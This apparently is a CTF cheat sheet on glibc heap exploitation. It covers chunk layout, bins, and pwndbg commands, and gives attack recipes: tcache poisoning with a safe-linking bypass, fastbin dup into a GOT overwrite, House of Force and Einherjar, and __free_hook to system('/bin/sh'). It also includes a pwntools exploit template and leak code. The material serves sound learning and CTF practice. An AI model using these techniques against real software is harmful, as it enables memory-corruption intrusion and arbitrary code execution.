heap::pwn

pwn heap · glibc tcache · fastbin
01 · Heap Chunk Structure
malloc_chunk layout
/* In memory (64-bit) */
/*  prev_size  (8 bytes) — size of previous chunk if free */
/*  size       (8 bytes) — size of THIS chunk + flags     */
/*  fd         (8 bytes) — forward ptr  (free only)       */
/*  bk         (8 bytes) — backward ptr (free only)       */
/*  fd_nextsize(8 bytes) — largebin only                  */
/*  bk_nextsize(8 bytes) — largebin only                  */
/*  user data  (size - metadata bytes)                     */

/* Size field flags (lowest 3 bits):                       */
A = bit 2   /* NON_MAIN_ARENA: chunk from non-main arena    */
M = bit 1   /* IS_MMAPPED: chunk from mmap()                */
P = bit 0   /* PREV_INUSE: previous chunk is allocated       */

/* malloc() returns pointer to user data (after headers)   */
/* chunk_ptr = user_ptr - 0x10 (subtract 2 * sizeof(size_t))*/

/* Minimum chunk size: 0x20 (32 bytes) on 64-bit           */
/* Chunks always aligned to 0x10 (16-byte alignment)       */
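The flag layout above can be checked with a few lines of arithmetic. A minimal sketch (pure Python, mirrors the comments; the example value is hypothetical):

```python
# Decode a raw chunk size field into (chunk size, flags).
NON_MAIN_ARENA, IS_MMAPPED, PREV_INUSE = 0x4, 0x2, 0x1

def decode_size(raw):
    size  = raw & ~0x7                       # mask off the 3 flag bits
    flags = {'A': bool(raw & NON_MAIN_ARENA),
             'M': bool(raw & IS_MMAPPED),
             'P': bool(raw & PREV_INUSE)}
    return size, flags

# 0x91 = a 0x90-byte chunk whose previous chunk is in use
size, flags = decode_size(0x91)
print(hex(size), flags)   # 0x90 {'A': False, 'M': False, 'P': True}
```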
Size calculation
# malloc(n) → chunk size (with header)
python3 -c "
def chunk_size(n):
    # add header (0x10), align to 0x10
    return ((n + 0x10 + 0xf) & ~0xf)
for n in [1, 8, 16, 24, 32, 48, 64, 128, 256]:
    print(f'malloc({n:4}) → chunk 0x{chunk_size(n):03x} ({chunk_size(n)} bytes)')
"

# Key sizes for bin classification (64-bit):
# Fastbin:  0x20 – 0x80  (min–max chunk size)
# Tcache:   0x20 – 0x410 (glibc >= 2.26)
# Smallbin: 0x20 – 0x3f0
# Largebin: >= 0x400
# Unsorted: any freed chunk goes here first
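The size ranges above can be folded into one lookup. A simplified sketch (real placement also depends on tcache fill counts and free order, not size alone):

```python
# Which bin families a 64-bit chunk size can end up in (by size only).
def classify(chunk_size):
    assert chunk_size % 0x10 == 0 and chunk_size >= 0x20
    bins = []
    if chunk_size <= 0x410:
        bins.append('tcache')      # glibc >= 2.26, if that bin isn't full
    if chunk_size <= 0x80:
        bins.append('fastbin')
    bins.append('smallbin' if chunk_size < 0x400 else 'largebin')
    return bins

print(classify(0x60))    # ['tcache', 'fastbin', 'smallbin']
print(classify(0x500))   # ['largebin']
```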
02 · Bins Reference
All bins at a glance
Bin       Chunk sizes (64-bit)  Count       Structure                    Key property
Tcache    0x20 – 0x410 (2.26+)  7 per size  Singly-linked (fd only)      Per-thread, no consolidation, checked first
Fastbin   0x20 – 0x80           unlimited   Singly-linked LIFO           No coalescing (next chunk's P bit stays set)
Unsorted  any                   1 bin       Doubly-linked                Freed chunks land here first, before sorting
Smallbin  0x20 – 0x3f0          62 bins     Doubly-linked FIFO           Exact size match, coalesced
Largebin  >= 0x400              63 bins     Doubly-linked + size-sorted  Ranges of sizes, best-fit
03 · Tcache (glibc 2.26+)
Tcache internals
/* tcache_perthread_struct (at start of heap) */
/* counts[64]  — how many chunks in each bin  */
/* entries[64] — singly-linked list heads     */

/* 64 bins, each for a different size          */
/* bin index = (size - 0x20) / 0x10            */
python3 -c "print((0x60 - 0x20) // 0x10)"  # → 4 (bin for 0x60)

/* Max 7 chunks per bin before falling to fastbin/unsorted */
/* tcache_entry: just fd pointer (+ key in glibc >= 2.29)  */

/* glibc 2.29+: key field = tcache_perthread_struct addr   */
/* → double free detected if key matches                   */
/* Bypass: overwrite key to 0 before second free()         */

/* glibc 2.32+: Safe-linking (PROTECT_PTR)                 */
/* stored_fd = real_fd XOR (addr >> 12)                    */
/* Need heap leak to decrypt/forge pointers                */
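The PROTECT_PTR round trip is a single XOR, so mangling and demangling use the same function. A sketch with hypothetical heap addresses:

```python
# glibc 2.32+ safe-linking: pos = address of the fd field being written,
# ptr = pointer value being stored.
def protect(pos, ptr):
    return (pos >> 12) ^ ptr

reveal = protect          # XOR is its own inverse

fd_addr    = 0x55550000a2a0   # hypothetical fd-field address
next_chunk = 0x55550000a300   # hypothetical next chunk in the bin
stored = protect(fd_addr, next_chunk)
assert reveal(fd_addr, stored) == next_chunk

# The first chunk in a tcache bin stores 0 ^ (fd_addr >> 12),
# so a UAF read of it leaks the heap page directly:
first = protect(fd_addr, 0)
assert first << 12 == fd_addr & ~0xfff
```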
Tcache poisoning
# Classic tcache dup (glibc < 2.29):
# 1. malloc(0x50) → chunk A
# 2. free(A)      → tcache[0x60].head = A
# 3. free(A)      → A.fd = A (points to itself)
# 4. malloc(0x50) → returns A
# 5. write target_addr into A's fd field
# 6. malloc(0x50) → returns A again
# 7. malloc(0x50) → returns target_addr !

# glibc 2.32+ safe-linking bypass:
python3 -c "
heap_leak = 0x...       # need a heap address
chunk_addr = heap_leak + 0x...
target = 0x404060       # where to write
# stored = target XOR (chunk_addr >> 12)
stored = target ^ (chunk_addr >> 12)
print(hex(stored))      # write this as fd
"
04 · pwndbg Heap Commands
View heap state
# Overview
heap                  # all allocated chunks
heap -v               # verbose (include free)
heap 0x...addr        # heap in specific arena

# Bins
bins                  # all bins summary
tcache                # tcache bins + counts
fastbins              # fastbin lists
unsortedbin           # unsorted bin
smallbins             # small bins
largebins             # large bins

# Visual
vis_heap_chunks       # color-coded heap map
vis_heap_chunks -n 30 # show 30 chunks

# Chunk at address
malloc_chunk 0x...addr
malloc_chunk -v 0x...addr  # verbose
Arena & libc
# Arena info
arena                 # main_arena struct
arenas                # all arenas
mp                    # malloc_par (heap config)

# Find libc from heap leak
# Unsorted bin: fd/bk → libc main_arena
# main_arena is at fixed offset from libc base
python3 -c "
# leak = fd pointer from unsorted bin chunk
leak = 0x7f1234567890
# main_arena offset varies by libc version
# find with: readelf -s libc.so | grep main_arena
# or: libc.address = leak - libc.sym['main_arena'] - 96
"

# Find tcache struct (heap_base + 0x10)
heap              # first chunk shown is the tcache struct
p *(tcache_perthread_struct *)(heap_base + 0x10)
# note the parens: cast AFTER the add, or pointer
# arithmetic scales the +0x10 by sizeof(struct)
05 · Heap Vulnerabilities
Vulnerability reference
Vuln                 How it occurs                 What you get                                Mitigations
Use-after-free (UAF) Use pointer after free()      Read/write of a freed chunk                 Dangling-ptr hygiene
Double free          free() same chunk twice       Tcache/fastbin dup                          tcache key check (2.29+)
Heap overflow        Write past chunk boundary     Corrupt next chunk's metadata               ASAN
Off-by-one           Write 1 byte past end         Modify next chunk's P bit or size           ASAN
Null-byte overflow   Off-by-null (strncpy etc.)    Clear P bit → fake prev_size → consolidate  —
Heap underflow       Write before chunk start      Corrupt previous chunk's metadata           —
Type confusion       Wrong type after realloc      Data interpreted as the wrong struct        —
06 · Heap Attacks
House of Force (old, no tcache)
# Overflow wilderness (top chunk) size → 0xffffffff...
# Then request huge allocation to reach target
# Next malloc returns target address

python3 -c "
top_chunk = 0x...          # top chunk address
target    = 0x404060       # where we want malloc to return
# Request size to reach target:
size = target - top_chunk - 0x20
print(hex(size))
"

# Works only when the top chunk size is not sanity-checked:
# - glibc < 2.29 (2.29 added a top-size check that kills it)
# - still needs an overflow reaching the top chunk's size field
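The request size works even when the target lies *below* the top chunk, because malloc's size arithmetic wraps mod 2^64. A sketch with hypothetical addresses:

```python
# House of Force wraparound: top chunk above the target still works.
top_chunk = 0x405000          # hypothetical top chunk address
target    = 0x404060          # hypothetical GOT entry below the heap
size = (target - top_chunk - 0x20) % (1 << 64)
print(hex(size))              # enormous request, but it wraps

# after the huge malloc, the next malloc returns near target:
assert (top_chunk + 0x20 + size) % (1 << 64) == target
```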
Fastbin dup → GOT overwrite
# 1. malloc(0x50) → A, malloc(0x50) → B
# 2. free(A) → free(B) → free(A) again
#    fastbin: A → B → A (cycle)
# 3. malloc(0x50) → A; write &target into A
#    fastbin: B → A → target
# 4. malloc(0x50) → B
# 5. malloc(0x50) → A
# 6. malloc(0x50) → target !

# Fastbin size check: fake chunk at target must have
# correct size field (matching fastbin index)
# Common target: __malloc_hook - 0x23 (size=0x7f trick)
search -8 0x7f   # find 0x7f size byte near __malloc_hook
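The six-step dup above can be sanity-checked with a toy freelist model (a Python list standing in for the singly-linked LIFO; writing A's fd is modeled by appending the target behind it):

```python
# Toy model of the fastbin freelist during the dup (head = index 0).
fastbin = []
def ffree(chunk):  fastbin.insert(0, chunk)   # push on head (LIFO)
def fmalloc():     return fastbin.pop(0)      # pop head

ffree('A'); ffree('B'); ffree('A')   # double free: list is A → B → A
a = fmalloc()                        # returns A; we now control A's fd
fastbin.append('target')             # A's fd rewritten to point at target
assert fmalloc() == 'B'
assert fmalloc() == 'A'
assert fmalloc() == 'target'         # malloc hands out the fake chunk
```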
Unsorted bin attack
# Corrupt unsorted bin bk pointer
# When chunk is sorted: *(bk + 0x10) = unsorted_bin_addr
# → writes main_arena+88 to target+0x10
# Classic: overwrite global_max_fast → enlarge fastbin range

# Tcache stashing (glibc 2.30+):
# Fill tcache, then calloc() bypasses tcache
# Gets chunk from smallbin
# Leftover smallbin chunks go to tcache
# Corrupt bk of smallbin → tcache gets arbitrary addr

# __free_hook / __malloc_hook (glibc < 2.34):
# Write system() to __free_hook
# free(ptr_to_binsh) → system("/bin/sh")
libc.sym['__free_hook']
libc.sym['__malloc_hook']
House of Einherjar / consolidation
# Off-by-null: clear PREV_INUSE bit of next chunk
# Set fake prev_size to point back far
# free(next_chunk) → consolidates backward
# Creates overlapping chunk → write to "freed" memory

# Off-by-one into size field:
# Increment chunk size → chunk overlaps next
# free(enlarged_chunk) → overlapping free region
# Next malloc from that region overlaps allocated data

# Heap feng shui: arrange layout for attack
# Groom heap: alloc/free specific sizes to get
# target chunk adjacent to controlled data
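The backward-consolidation step is plain pointer arithmetic: free() merges with the chunk at `victim - prev_size`, so the planted prev_size is just the distance to the fake chunk. A sketch with hypothetical addresses:

```python
# Forge prev_size so "the previous chunk" is our controlled fake chunk.
victim_chunk = 0x55550000b440   # hypothetical chunk with P bit cleared
fake_chunk   = 0x55550000b2a0   # hypothetical controlled region
prev_size = victim_chunk - fake_chunk
assert victim_chunk - prev_size == fake_chunk
print(hex(prev_size))           # value to plant in victim's prev_size field
```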
07 · pwntools Heap Helpers
Tcache poison template
from pwn import *

elf  = ELF('./challenge')
libc = ELF('./libc.so.6')
p    = process('./challenge')

# Helper: alloc / free wrappers (adjust to challenge API)
def alloc(size, data=b''):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'size: ', str(size).encode())
    if data: p.sendlineafter(b'data: ', data)
    return int(p.recvline())   # chunk index

def free(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'idx: ', str(idx).encode())

def read(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'idx: ', str(idx).encode())
    return p.recvline()

# Tcache poison (no safe-linking)
a = alloc(0x50)
b = alloc(0x50)
free(a)
free(b)
free(a)                          # double free — now a→b→a

alloc(0x50, p64(elf.got['puts']))  # write target as fd
alloc(0x50)
alloc(0x50)
alloc(0x50, p64(libc.sym['system']))  # write to GOT
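On glibc 2.32+ the fd written in the poison step must be mangled for safe-linking. A small helper, assuming `chunk_addr` is a leaked address of the poisoned chunk's fd field (hypothetical values below):

```python
# Safe-linking mangle for the poisoned fd (glibc 2.32+).
def mangle(fd_addr, target):
    return target ^ (fd_addr >> 12)

chunk_addr = 0x55550000a2a0     # hypothetical: from a heap leak
target     = 0x404060           # hypothetical write target
# alloc(0x50, p64(mangle(chunk_addr, target)))   # instead of raw p64(target)
print(hex(mangle(chunk_addr, target)))
```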
08 · CTF Tips
Version detection
# Check glibc version of the provided libc
./libc.so.6                        # glibc is executable — prints its version
strings ./libc.so.6 | grep "GNU C Library"
ldd --version                      # host glibc (only relevant if run locally)

# Version-specific features:
# < 2.26: no tcache — fastbin/unsorted attacks
# 2.26-2.28: tcache, no key — easy double free
# 2.29: tcache key — need to clear it
# 2.32: safe-linking — need heap leak
# 2.34: __free_hook/__malloc_hook removed
# 2.34+: tcache key randomized (no longer the tcache struct ptr)

# After 2.34: targets for arbitrary write
# _IO_list_all, exit_funcs, setcontext gadget
# dl-resolve, tls_dtor_list, mp_.tcache_bins
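The version gates above can be folded into a quick lookup. A sketch (summarizes only the thresholds listed here; `technique_notes` is a hypothetical helper name):

```python
# Map a glibc version tuple to the applicable notes from the list above.
def technique_notes(ver):               # ver = (major, minor), e.g. (2, 31)
    notes = []
    if ver >= (2, 26): notes.append('tcache present')
    if ver >= (2, 29): notes.append('tcache key: clear it before double free')
    if ver >= (2, 32): notes.append('safe-linking: need heap leak')
    if ver >= (2, 34): notes.append('no __malloc_hook/__free_hook targets')
    return notes or ['no tcache: fastbin/unsorted attacks']

print(technique_notes((2, 27)))   # ['tcache present']
print(technique_notes((2, 35)))
```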
Leak strategies
# Libc leak: UAF read on freed unsorted chunk
# → fd/bk point into libc main_arena
a = alloc(0x400)   # large → unsorted bin when freed
alloc(0x20)        # guard chunk (prevent top consolidation)
free(a)
leak = u64(read(a)[:8].ljust(8, b'\x00'))
libc.address = leak - libc.sym['main_arena'] - 96

# Heap leak: UAF read on freed tcache chunk
# glibc < 2.32: fd = next chunk (0 if first)
# glibc 2.32+: fd = PROTECT_PTR(addr, next)
# First chunk in tcache: fd = 0 ^ (addr>>12)
# → leak = stored_fd  → heap = leak << 12
b = alloc(0x20)
free(b)
raw = u64(read(b)[:8].ljust(8, b'\x00'))
heap_base = raw << 12   # approximate
HEAP CHECKLIST →  ① Check glibc version (determines available techniques)  ② vis_heap_chunks after each alloc/free  ③ bins to see current freelist state  ④ UAF read on freed chunk → libc leak (unsorted) or heap leak (tcache)  ⑤ Double free → tcache poison → arbitrary malloc  ⑥ Target: __free_hook (< 2.34) or GOT / tcache metadata  ⑦ Safe-linking (2.32+): need heap leak to forge fd